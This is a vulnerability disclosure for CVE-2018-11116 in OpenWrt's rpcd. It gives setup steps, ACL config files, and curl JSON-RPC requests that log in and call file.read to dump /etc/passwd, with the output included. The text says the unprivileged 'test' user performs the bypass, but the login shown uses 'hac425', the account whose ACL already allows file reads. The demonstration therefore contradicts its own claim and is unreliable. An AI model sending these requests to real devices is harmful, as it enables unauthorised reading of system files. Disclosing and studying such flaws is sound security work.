【CVE-2018-11116】openwrt rpcd 配置文件错误导致访问控制失效

User can access to ubus over HTTP. This way depend on rpcd service. When misconfigure the rpcd's ACL , It could lead the ACL don't work.

Steps to produce the problem

First you should get an machine running openwrt And install uhttpd and luci to provide http service

opkg update
opkg install luci

Then to install some tools to add users in openwrt。

opkg install shadow-common
opkg install shadow-useradd
opkg install rpcd-mod-file

And then I add 2 user and make them can login in rpcd by modiy the rpcd config file.

root@OpenWrt:~# cat /etc/config/rpcd 

config login
    option username 'hac425'
    option password '$p$hac425'
    list read '*'
    list write '*'
config login
        option username 'test'
        option password '$p$test'
        list read '*'
        list write '*'

Next I create an config file for provide ACL to user who's username is hac425 (the config file come from wiki for openwrt

root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json
{
        "hac425": {
                "description": "acl for hac425",
                "read": {
                        "ubus": {
                                "file": [ "*" ],
                                "log": [ "*" ],
                                "service": [ "*" ],
                        },
                },
                "write": {
                        "ubus": {
                                "file": [ "*" ],
                                "log": [ "*" ],
                                "service": [ "*" ],
                        },
                }
        }
}
root@OpenWrt:/usr/share/rpcd/acl.d#

​

This let hac425 can call all methods in  file namespace ( "file": [ "*" ] )

I didn't create the acl file for user who's name is test, It mean that test user can only call the methods defined in unauthenticated.json.

However , when I test it , I found that the user test can also call the methods which is only allowed to hac425 user.

For example, The test user can call read method in  file namespace which is not permited to him.

Next I would show it to you.

First I use test user's username and password to login , and get the ubus_rpc_session (this value should  be used to call other method defined in Acl config files)

06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123"  } ] }'  http://192.168.31.111/ubus

{"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}

Then use the ubus_rpc_session  to call read method in file namespace to read the content of /etc/passwd

06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nhac425:x:1000:1000::\/home\/hac425:\ntest:x:1001:1001::\/home\/test:\n"}]}

Then we could get the file content.

This means that I can use test user to call read method  which is not permited to test user.

Bypass the acl.

Conclusion

The vulneratility  may lead the rpcd acl don't work successful.

This lead the evil user can call the method which is only permited call by otherone user.